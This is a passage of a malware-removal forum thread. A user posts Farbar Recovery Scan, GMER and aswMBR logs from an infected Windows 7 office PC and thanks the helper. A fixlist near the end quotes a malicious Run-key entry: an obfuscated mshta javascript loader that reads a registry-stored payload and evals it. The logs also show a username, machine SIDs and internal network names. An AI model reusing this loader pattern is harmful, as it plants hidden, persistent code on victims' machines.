Canon MF8300 Series (HKLM\...\{E47364AA-6B5E-45a2-B94F-BC5D9D6A0338}) (Version: - )
CCleaner (HKLM\...\CCleaner) (Version: 5.23 - Piriform)
Citrix Online Launcher (HKLM-x32\...\{DB014C85-A264-4BCA-A66F-6DD1FCF8EC36}) (Version: 1.0.335 - Citrix)
CYMA IV Accounting Workstation (HKLM-x32\...\{6F43D45B-4C72-4BB8-9601-BFE282765A38}) (Version: 14.3.0 - CYMA Systems Inc.)
CYMA IV Accounting Workstation (x32 Version: 13.0.0 - CYMA Systems Inc.) Hidden
CYMA IV Accounting Workstation (x32 Version: 14.0.0 - CYMA Systems Inc.) Hidden
DiskCheckup v3.4 (HKLM-x32\...\DiskCheckup_is1) (Version: 3.4.1002 - PassMark Software)
FlashPeak Slimjet (HKLM-x32\...\Slimjet) (Version: 12.0.6.0 - FlashPeak Inc.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 54.0.2840.99 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.31.5 - Google Inc.) Hidden
GoToAssist Corporate (HKLM-x32\...\GoToAssist) (Version: 11.0.0.1019 - Citrix Online, a division of Citrix Systems, Inc.)
GoToAssist Customer 2.7.0.1092 (HKLM-x32\...\GoToAssist Express Customer) (Version: 2.7.0.1092 - Citrix Online)
GoToMeeting 7.27.0.5922 (HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\...\GoToMeeting) (Version: 7.27.0.5922 - CitrixOnline)
Intel Security True Key (HKLM\...\TrueKey) (Version: 4.0.157.1 - Intel Security)
Intel(R) Network Connections 21.1.30.0 (HKLM\...\PROSetDX) (Version: 21.1.30.0 - Intel)
Java 8 Update 111 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180111F0}) (Version: 8.0.1110.14 - Oracle Corporation)
LogMeIn (HKLM-x32\...\{F099EA75-A298-4A13-93CB-D2446436B137}) (Version: 4.1.3888 - LogMeIn, Inc.)
Malwarebytes Anti-Malware version 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
marvell 91xx driver (HKLM-x32\...\MagniDriver) (Version: 1.0.0.1047 - Marvell)
Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft Office Professional 2010 (HKLM-x32\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation)
MyDefrag v4.3.1 (HKLM\...\MyDefrag v4.3.1_is1) (Version: 4.0.0.0 - J.C. Kessels)
NVIDIA 3D Vision Controller Driver 340.50 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 340.50 - NVIDIA Corporation)
NVIDIA 3D Vision Driver 341.81 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 341.81 - NVIDIA Corporation)
NVIDIA GeForce Experience 2.2.2 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.2.2 - NVIDIA Corporation)
NVIDIA Graphics Driver 341.81 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 341.81 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.30.1 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.30.1 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.13.1220 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.13.1220 - NVIDIA Corporation)
Pervasive PSQL v10 SP3 Workgroup (32-bit) (HKLM-x32\...\Pervasive PSQL v10 SP3 Workgroup (32-bit)) (Version: 10.30.024 - Pervasive Software)
Pervasive PSQL v10 SP3 Workgroup (32-bit) (x32 Version: 10.30.024 - Pervasive Software) Hidden
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6257 - Realtek Semiconductor Corp.)
Renesas Electronics USB 3.0 Host Controller Driver (HKLM-x32\...\InstallShield_{5442DAB8-7177-49E1-8B22-09A049EA5996}) (Version: 2.0.26.0 - Renesas Electronics Corporation)
Renesas Electronics USB 3.0 Host Controller Driver (x32 Version: 2.0.26.0 - Renesas Electronics Corporation) Hidden
Revo Uninstaller 1.95 (HKLM-x32\...\Revo Uninstaller) (Version: 1.95 - VS Revo Group)
Roadkil's CommTest Version 1.3 (HKLM-x32\...\{DB6A986B-CCF7-4041-81ED-80EB2C106CC5}_is1) (Version: - Roadkil.Net)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version: - Microsoft)
SHIELD Streaming (Version: 4.0.1000 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 17.12.8 - NVIDIA Corporation) Hidden
Sophos Virus Removal Tool (HKLM-x32\...\{B829E117-D072-41EA-9606-9826A38D34C1}) (Version: 2.5.6 - Sophos Limited)
Symantec Endpoint Protection (HKLM\...\{827E3EA6-85D1-4413-96D8-24B0F9B49967}) (Version: 12.1.4112.4156 - Symantec Corporation)
WIDCOMM Bluetooth Software (HKLM\...\{A1439D4F-FD46-47F2-A1D3-FEE097C29A09}) (Version: 6.5.1.5800 - Broadcom Corporation)
Windows Small Business Server 2008 ClientAgent (HKLM\...\{E4FF4DF1-F99C-49AC-B398-BE0887432846}) (Version: 6.0.5601.0 - Microsoft Corporation)
Windows Small Business Server 2008 Desktop Links Gadget (HKLM\...\{F5E5D7CA-0F94-41A3-8106-66473C2F3728}) (Version: 6.0.5601.0 - Microsoft Corporation)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-3320201264-2921037059-4171379232-1148_Classes\CLSID\{84B5A313-CD5D-4904-8BA2-AFDC81C1B309}\InprocServer32 -> C:\Users\cjerald\AppData\Local\Citrix\GoToMeeting\5636\G2MOutlookAddin64.dll (Citrix Online, a division of Citrix Systems, Inc.)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {00CE36DB-6A59-4EDB-9CE8-3D9F4F58544F} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-09-26] (Adobe Systems Incorporated)
Task: {67103020-3F8F-4EDA-8E62-70B7D54ACB04} - System32\Tasks\G2MUploadTask-S-1-5-21-3320201264-2921037059-4171379232-1148 => C:\Users\cjerald\AppData\Local\Citrix\GoToMeeting\5922\g2mupload.exe [2016-11-19] (Citrix Online, a division of Citrix Systems, Inc.)
Task: {748E8811-5D55-4A95-920A-A2AB97876CA2} - System32\Tasks\G2MUpdateTask-S-1-5-21-3320201264-2921037059-4171379232-1148 => C:\Users\cjerald\AppData\Local\Citrix\GoToMeeting\5922\g2mupdate.exe [2016-11-19] (Citrix Online, a division of Citrix Systems, Inc.)
Task: {791D2EF3-CC5F-456B-BA1D-73D0FF09CA20} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-31] (Google Inc.)
Task: {7C218579-20A7-4E64-865C-4259D7EE197E} - System32\Tasks\{F111F422-023F-4E16-B5C9-51B124B93F42} => C:\Program Files (x86)\Canon\MF Toolbox Ver4.9\MFTBOX.exe [2009-06-22] (CANON INC.)
Task: {7F116B38-B214-4CB7-8D57-75B6AD0DA29B} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-09-28] (Piriform Ltd)
Task: {90796BBB-1718-4BBD-90E0-BD8974C45185} - System32\Tasks\McAfee Remediation (Prepare) => C:\Program Files\Common Files\AV\McAfee Anti-Virus And Anti-Spyware\upgrade.exe [2016-03-01] (McAfee, Inc.)
Task: {CAA82495-2800-4590-9E6F-20FBD34E3713} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2016-11-02] (AVAST Software)
Task: {CAD262DC-4394-4840-AF0D-12204F01BD2F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-31] (Google Inc.)
Task: {F7F3F4E1-31FF-4508-ADC1-D18EE21605A9} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-10-21] (Adobe Systems Incorporated)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-3320201264-2921037059-4171379232-1148.job => C:\Users\cjerald\AppData\Local\Citrix\GoToMeeting\5922\g2mupdate.exe
Task: C:\Windows\Tasks\G2MUploadTask-S-1-5-21-3320201264-2921037059-4171379232-1148.job => C:\Users\cjerald\AppData\Local\Citrix\GoToMeeting\5922\g2mupload.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

Shortcut: C:\Users\cjerald\AppData\Local\322148\4c5510.lnk -> C:\Users\cjerald\AppData\Local\322148\83934e.bat (No File)

==================== Loaded Modules (Whitelisted) ==============

2015-11-25 14:00 - 2016-11-16 22:12 - 00356008 _____ () C:\Program Files (x86)\Backblaze\bzserv.exe
2013-12-12 13:16 - 2015-08-17 19:07 - 00115376 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2015-11-25 14:00 - 2016-11-16 22:12 - 00596648 _____ () C:\Program Files (x86)\Backblaze\bzbui.exe

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\GoToAssist => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SepMasterService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SmcService => ""="Service"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:34 - 2016-11-01 12:29 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1 localhost

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\Control Panel\Desktop\\Wallpaper -> C:\Users\cjerald\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.0.105 - 192.168.0.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

MSCONFIG\Services: AdobeARMservice => 2
MSCONFIG\Services: AdobeFlashPlayerUpdateSvc => 3
MSCONFIG\Services: btwdins => 2
MSCONFIG\Services: GoToAssist => 3
MSCONFIG\Services: gupdate => 2
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: Intel(R) PROSet Monitoring Service => 2
MSCONFIG\Services: LMIGuardianSvc => 2
MSCONFIG\Services: LMIMaint => 2
MSCONFIG\Services: LogMeIn => 2
MSCONFIG\Services: UNS => 2
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Bluetooth.lnk => C:\Windows\pss\Bluetooth.lnk.CommonStartup
MSCONFIG\startupreg: Acrobat Assistant 8.0 => "C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrotray.exe"
MSCONFIG\startupreg: Adobe Acrobat Speed Launcher => "C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrobat_sl.exe"
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: LogMeIn GUI => "C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe"
MSCONFIG\startupreg: RtHDVCpl => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [SPPSVC-In-TCP-NoScope] => %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP] => %SystemRoot%\system32\sppsvc.exe
FirewallRules: [TCP Query User{A79DD511-2162-4E17-84DC-E427C7089D6F}C:\program files (x86)\google\chrome\application\chrome.exe] => C:\program files (x86)\google\chrome\application\chrome.exe
FirewallRules: [UDP Query User{927A5DA9-3912-4C00-993F-5E7E7D2E378C}C:\program files (x86)\google\chrome\application\chrome.exe] => C:\program files (x86)\google\chrome\application\chrome.exe
FirewallRules: [{C91EBF51-63D3-487A-A5C4-4AA7ECAA3F63}] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{12BE54D9-D811-4084-B305-9C0CDDE91A9E}] => C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\Smc.exe
FirewallRules: [{0221E735-4049-4942-B8A0-C1023385A22A}] => C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\Smc.exe
FirewallRules: [{EFC291DC-7AA8-46EF-9D8C-86542FBA9448}] => C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\snac64.exe
FirewallRules: [{FA416475-07C3-4377-AD2B-158E3ECF4CC9}] => C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\snac64.exe

==================== Restore Points =========================

18-11-2016 15:31:55 Malwarebytes Anti-Rootkit Restore Point
21-11-2016 02:01:12 Restore Point Created by FRST
29-11-2016 00:00:01 Scheduled Checkpoint

==================== Faulty Device Manager Devices =============

==================== Event log errors: =========================

Application errors:
==================
Error: (12/01/2016 03:43:36 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (11/30/2016 09:06:30 AM) (Source: Symantec AntiVirus) (EventID: 51) (User: IDS)
Description: Security Risk Found!Hosts File Change in File: c:\program files (x86)\slimjet\slimjet.exe by: SONAR scan. Action: . Action Description: Access Denied

Error: (11/30/2016 09:06:30 AM) (Source: Symantec AntiVirus) (EventID: 51) (User: IDS)
Description: Security Risk Found!Hosts File Change in File: c:\program files (x86)\slimjet\slimjet.exe by: SONAR scan. Action: . Action Description: Access Denied

Error: (11/30/2016 09:00:30 AM) (Source: Symantec AntiVirus) (EventID: 51) (User: IDS)
Description: Security Risk Found!Hosts File Change in File: c:\program files (x86)\slimjet\slimjet.exe by: SONAR scan. Action: . Action Description: Access Denied

Error: (11/30/2016 09:00:29 AM) (Source: Symantec AntiVirus) (EventID: 51) (User: IDS)
Description: Security Risk Found!Hosts File Change in File: c:\program files (x86)\slimjet\slimjet.exe by: SONAR scan. Action: . Action Description: Access Denied

Error: (11/30/2016 05:08:26 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (11/30/2016 04:38:04 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (11/28/2016 07:55:11 AM) (Source: SceCli) (EventID: 1001) (User: )
Description: Security policy cannot be propagated. Cannot access the template. Error code = 3. \\ids.local\sysvol\ids.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf.

Error: (11/28/2016 07:51:11 AM) (Source: Microsoft-Windows-Folder Redirection) (EventID: 511) (User: IDS)
Description: Failed to process policy info. Error details: "The specified network name is no longer available. ".

Error: (11/28/2016 06:17:10 AM) (Source: SceCli) (EventID: 1001) (User: )
Description: Security policy cannot be propagated. Cannot access the template. Error code = 3. \\ids.local\sysvol\ids.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf.


System errors:
=============
Error: (11/30/2016 04:47:02 AM) (Source: DCOM) (EventID: 10005) (User: )
Description: DCOM got error "1084" attempting to start the service WSearch with arguments "" in order to run the server: {9E175B6D-F52A-11D8-B9A5-505054503030}

Error: (11/30/2016 04:41:31 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Computer Browser service depends on the Server service which failed to start because of the following error: The dependency service or group failed to start.

Error: (11/30/2016 04:41:31 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Computer Browser service depends on the Server service which failed to start because of the following error: The dependency service or group failed to start.

Error: (11/30/2016 04:41:31 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Computer Browser service depends on the Server service which failed to start because of the following error: The dependency service or group failed to start.
Error: (11/30/2016 04:41:31 AM) (Source: Service Control Manager) (EventID: 7001) (User: ) Description: The Computer Browser service depends on the Server service which failed to start because of the following error: The dependency service or group failed to start. Error: (11/30/2016 04:41:31 AM) (Source: Service Control Manager) (EventID: 7001) (User: ) Description: The Computer Browser service depends on the Server service which failed to start because of the following error: The dependency service or group failed to start. Error: (11/30/2016 04:41:31 AM) (Source: Service Control Manager) (EventID: 7001) (User: ) Description: The Computer Browser service depends on the Server service which failed to start because of the following error: The dependency service or group failed to start. Error: (11/30/2016 04:39:36 AM) (Source: DCOM) (EventID: 10005) (User: ) Description: DCOM got error "1068" attempting to start the service fdPHost with arguments "" in order to run the server: {D3DCB472-7261-43CE-924B-0704BD730D5F} Error: (11/30/2016 04:39:35 AM) (Source: DCOM) (EventID: 10005) (User: ) Description: DCOM got error "1068" attempting to start the service fdPHost with arguments "" in order to run the server: {145B4335-FE2A-4927-A040-7C35AD3180EF} Error: (11/30/2016 04:38:35 AM) (Source: DCOM) (EventID: 10005) (User: ) Description: DCOM got error "1084" attempting to start the service WSearch with arguments "" in order to run the server: {7D096C5F-AC08-4F1F-BEB7-5C22C517CE39} CodeIntegrity: =================================== Date: 2016-11-01 13:28:46.075 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. 
Date: 2016-11-01 13:28:46.012 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2016-11-01 13:28:45.950 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2016-11-01 13:28:45.887 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2016-05-26 11:17:53.508 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2016-05-26 11:17:53.446 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. 
Date: 2016-05-26 11:17:53.399 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2016-05-26 11:17:53.337 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2015-09-18 10:50:59.242 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2015-09-18 10:50:59.210 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. 
==================== Memory info =========================== Processor: Intel(R) Core(TM) i5-2320 CPU @ 3.00GHz Percentage of memory in use: 24% Total physical RAM: 8161.36 MB Available physical RAM: 6125.31 MB Total Virtual: 16320.89 MB Available Virtual: 14303.69 MB ==================== Drives ================================ Drive c: () (Fixed) (Total:465.66 GB) (Free:376.59 GB) NTFS ==================== MBR & Partition Table ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 158191E4) Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=465.7 GB) - (Type=07 NTFS) ==================== End of Addition.txt ============================
  8. LOLs > " This log will be excessive " Thank you for your help *and* the laughs! cureit.log
  9. Delayed due to holidays. Will reply next week. Thank you.
  10. Thank you again.

Fix result of Farbar Recovery Scan Tool (x64) Version: 20-11-2016 01
Ran by cjerald (23-11-2016 05:39:39) Run:3
Running from \\SPARTA\RedirectedFolders\cjerald\Desktop
Loaded Profiles: cjerald (Available Profiles: Clayton & cjerald)
Boot Mode: Normal
==============================================

fixlist content:
*****************
Start
Reg: reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\BTHPORT\Parameters\Keys"
end
*****************


========= reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\BTHPORT\Parameters\Keys" =========

ERROR: Access is denied.

========= End of Reg: =========

==== End of Fixlog 05:39:42 ====
  11. Thank for your continuing diligence! :-)

GMER 2.2.19882 - http://www.gmer.net
Rootkit scan 2016-11-23 03:37:50
Windows 6.1.7601 Service Pack 1 x64 \Device\Harddisk0\DR0 -> \Device\Ide\IdeDeviceP2T0L0-2 WDC_WD5003AZEX-00K1GA0 rev.80.00A80 465.76GB
Running: vixxw3jv.exe; Driver: C:\Users\cjerald\AppData\Local\Temp\pxldapow.sys

---- Registry - GMER 2.2 ----

Reg HKLM\SYSTEM\CurrentControlSet\services\BTHPORT\Parameters\Keys\f065dd6bdb86
Reg HKLM\SYSTEM\CurrentControlSet\services\BTHPORT\Parameters\Keys\f065dd6bdb86@0000000019c1 0xBE 0x4C 0x9B 0xEE ...
Reg HKLM\SYSTEM\ControlSet002\services\BTHPORT\Parameters\Keys\f065dd6bdb86 (not active ControlSet)
Reg HKLM\SYSTEM\ControlSet002\services\BTHPORT\Parameters\Keys\f065dd6bdb86@0000000019c1 0xBE 0x4C 0x9B 0xEE ...

---- EOF - GMER 2.2 ----

aswMBR version 1.0.1.2290 Copyright(c) 2014 AVAST Software
Run date: 2016-11-23 03:40:36
-----------------------------
03:40:36.147 OS Version: Windows x64 6.1.7601 Service Pack 1
03:40:36.147 Number of processors: 4 586 0x2A07
03:40:36.147 ComputerName: PC-8 UserName:
03:40:39.761 Initialize success
03:40:39.839 VM: initialized successfully
03:40:39.839 VM: Intel CPU supported
03:40:45.698 VM: supported disk I/O ataport.SYS
03:42:00.855 AVAST engine defs: 16112201
03:42:05.997 Disk 0 (boot) \Device\Harddisk0\DR0 -> \Device\Ide\IdeDeviceP2T0L0-2
03:42:06.007 Disk 0 Vendor: WDC_WD5003AZEX-00K1GA0 80.00A80 Size: 476940MB BusType: 3
03:42:06.457 Disk 0 MBR read successfully
03:42:06.467 Disk 0 MBR scan
03:42:06.467 Disk 0 Windows 7 default MBR code
03:42:06.497 Disk 0 Partition 1 80 (A) 07 HPFS/NTFS NTFS 100 MB offset 2048
03:42:06.517 Disk 0 default boot code
03:42:06.547 Disk 0 Partition 2 00 07 HPFS/NTFS NTFS 476838 MB offset 206848
03:42:06.677 Disk 0 scanning C:\Windows\system32\drivers
03:42:43.432 Service scanning
03:43:08.336 Modules scanning
03:43:08.664 Disk 0 trace - called modules:
03:43:08.679 ntoskrnl.exe CLASSPNP.SYS disk.sys ACPI.sys ataport.SYS pciide.sys PCIIDEX.SYS hal.dll atapi.sys
03:43:08.695 1 nt!IofCallDriver -> \Device\Harddisk0\DR0[0xfffffa8007821060]
03:43:08.695 3 CLASSPNP.SYS[fffff88000dd143f] -> nt!IofCallDriver -> [0xfffffa80073d3d10]
03:43:08.711 5 ACPI.sys[fffff88000f027a1] -> nt!IofCallDriver -> \Device\Ide\IdeDeviceP2T0L0-2[0xfffffa800756e680]
03:43:12.657 AVAST engine scan C:\Windows
03:43:24.539 AVAST engine scan C:\Windows\system32
03:48:06.945 AVAST engine scan C:\Windows\system32\drivers
03:48:35.066 AVAST engine scan C:\Users\cjerald
03:59:06.261 AVAST engine scan C:\ProgramData
04:07:28.085 Disk 0 statistics 7105423/0/0 @ 2.99 MB/s
04:07:28.100 Scan finished successfully
04:07:40.828 Disk 0 MBR has been saved successfully to "\\SPARTA\RedirectedFolders\cjerald\Desktop\MBR.dat"
04:07:40.938 The log file has been saved successfully to "\\SPARTA\RedirectedFolders\cjerald\Desktop\aswMBR.txt"
  12. Same ones appear (have reappeared?) as before. Please also see fixlog.txt below to prove it was run. Also included rescan by MBAM after MBAM removal and reboot. Look forward to your advice on next steps. Thank you again.

Fix result of Farbar Recovery Scan Tool (x64) Version: 20-11-2016 01
Ran by CJerald (21-11-2016 02:01:12) Run:1
Running from \\SPARTA\RedirectedFolders\cjerald\Desktop
Loaded Profiles: CJerald (Available Profiles: Clayton & CJerald)
Boot Mode: Normal
==============================================

fixlist content:
*****************
Start
CreateRestorePoint:
CloseProcesses:
KU\S-1-5-21-3320201264-2921037059-4171379232-1148\...\Run: [**pmrnby<*>] => "C:\Windows\system32\mshta.exe" javascript:T3ijyR1="CI6m7d";C90X=new%20ActiveXObject("WScript.Shell");v3atS8h="c";uT1ax2=C90X.RegRead("HKCU\\software\\auux\\onnlw");LK9oPb9="8oAt";eval(uT1ax2);Xr1GT=" (the data entry has 8 more characters). <===== ATTENTION (Value Name with invalid characters)
